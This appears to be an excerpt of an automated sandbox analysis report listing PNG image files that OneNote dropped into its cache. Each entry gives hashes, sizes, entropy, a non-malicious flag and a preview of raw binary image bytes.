                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
